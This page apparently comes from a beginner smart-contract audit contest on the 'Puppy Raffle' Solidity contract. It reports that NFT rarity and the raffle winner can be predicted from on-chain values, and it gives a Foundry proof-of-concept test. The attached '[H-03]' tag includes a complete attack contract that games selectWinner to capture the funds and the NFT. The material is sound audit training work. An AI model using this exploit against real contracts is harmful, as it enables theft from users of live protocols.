Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Predictable NFT Rarity Assignment Allows Manipulation of Rare Token Distribution

georgibuilds

Root + Impact

The NFT rarity assignment uses predictable on-chain data (`msg.sender`, `block.difficulty`) allowing attackers who control when `selectWinner()` is called to predict and potentially influence which rarity level they receive. While this doesn't guarantee specific rarity outcomes, it provides unfair advantage in rare NFT distribution.

Description

NFT rarity is determined using only two predictable inputs:

function selectWinner() external {

// ... winner selection ...

uint256 tokenId = totalSupply();

// @audit Only msg.sender and block.difficulty - both predictable!

uint256 rarity = uint256(keccak256(abi.encodePacked(

msg.sender, // @audit Caller address (known)

block.difficulty // @audit Public blockchain data (constant in PoS)

))) % 100;

// Rarity distribution:

// 0-70: Common (70%)

// 71-95: Rare (25%)

// 96-99: Legendary (5%)

if (rarity <= COMMON_RARITY) {

tokenIdToRarity[tokenId] = COMMON_RARITY;

} else if (rarity <= COMMON_RARITY + RARE_RARITY) {

tokenIdToRarity[tokenId] = RARE_RARITY;

} else {

tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

}

```

Attack vector: Caller can predict rarity before calling selectWinner(). Combined with the ability to predict winners (separate finding), attacker can optimize for both winning AND receiving desired rarity.

Note: block.difficulty is deprecated in PoS Ethereum and remains constant, making prediction even easier.

Risk

Likelihood:

Requires attacker to win raffle (separate vulnerability enables this)

Prediction calculation is simple off-chain

block.difficulty changes very rarely (or never in PoS)

Impact:

Unfair distribution of rare NFTs

Collectors of rare NFTs are disadvantaged

Protocol's rarity distribution becomes manipulable

Does not directly steal funds, but affects NFT value/fairness

Proof of Concept

// Add to test/PuppyRaffleTest.t.sol

function testPredictableRarityManipulation() public {

// Setup players

address[] memory players = new address[](4);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

players[3] = playerFour;

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

vm.warp(block.timestamp + duration + 1);

// Attacker can predict rarity BEFORE calling selectWinner()

address attacker = address(this);

uint256 currentDifficulty = block.difficulty;

uint256 predictedRarity = uint256(keccak256(abi.encodePacked(

attacker,

currentDifficulty

))) % 100;

console.log("Predicted rarity value:", predictedRarity);

if (predictedRarity <= 70) {

console.log("Will receive: COMMON");

} else if (predictedRarity <= 95) {

console.log("Will receive: RARE");

} else {

console.log("Will receive: LEGENDARY");

}

// Attacker decides whether to call based on predicted rarity

// If targeting Legendary and prediction shows Common, attacker can:

// - Use different address (if controlling multiple)

// - Wait for difficulty change (rare in PoS)

// - Accept Common or skip calling

// Demonstrate prediction accuracy

puppyRaffle.selectWinner();

uint256 tokenId = 0;

uint256 actualRarity = puppyRaffle.tokenIdToRarity(tokenId);

// Verify prediction matched actual

if (predictedRarity <= 70) {

assertEq(actualRarity, 70, "Should be Common");

} else if (predictedRarity <= 95) {

assertEq(actualRarity, 25, "Should be Rare");

} else {

assertEq(actualRarity, 5, "Should be Legendary");

}

console.log("Prediction was accurate!");

}

// Run: forge test --mt testPredictableRarityManipulation -vv

// Result: Demonstrates attacker can accurately predict NFT rarity before execution

Recommended Mitigation

Alternative (if keeping current RNG): Include additional unpredictable entropy like block.prevrandao (PoS) or future block hash, though Chainlink VRF is strongly recommended for true randomness.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "Raffle not over");

require(players.length >= 4, "Need at least 4 players");

+ // Use Chainlink VRF for both winner AND rarity (recommended)

+ // Or use commit-reveal for both

+ // If using Chainlink VRF:

+ s_requestId = COORDINATOR.requestRandomWords(...);

+ // Then in fulfillRandomWords callback:

+ // uint256 randomness = randomWords[0];

+ // uint256 winnerIndex = randomness % players.length;

+ // uint256 rarity = (randomness / players.length) % 100; // Reuse same random value

- uint256 rarity = uint256(keccak256(abi.encodePacked(

- msg.sender,

- block.difficulty

- ))) % 100;

+ uint256 rarity = (verifiableRandomNumber / players.length) % 100;

// ... rest of rarity assignment

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 23 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!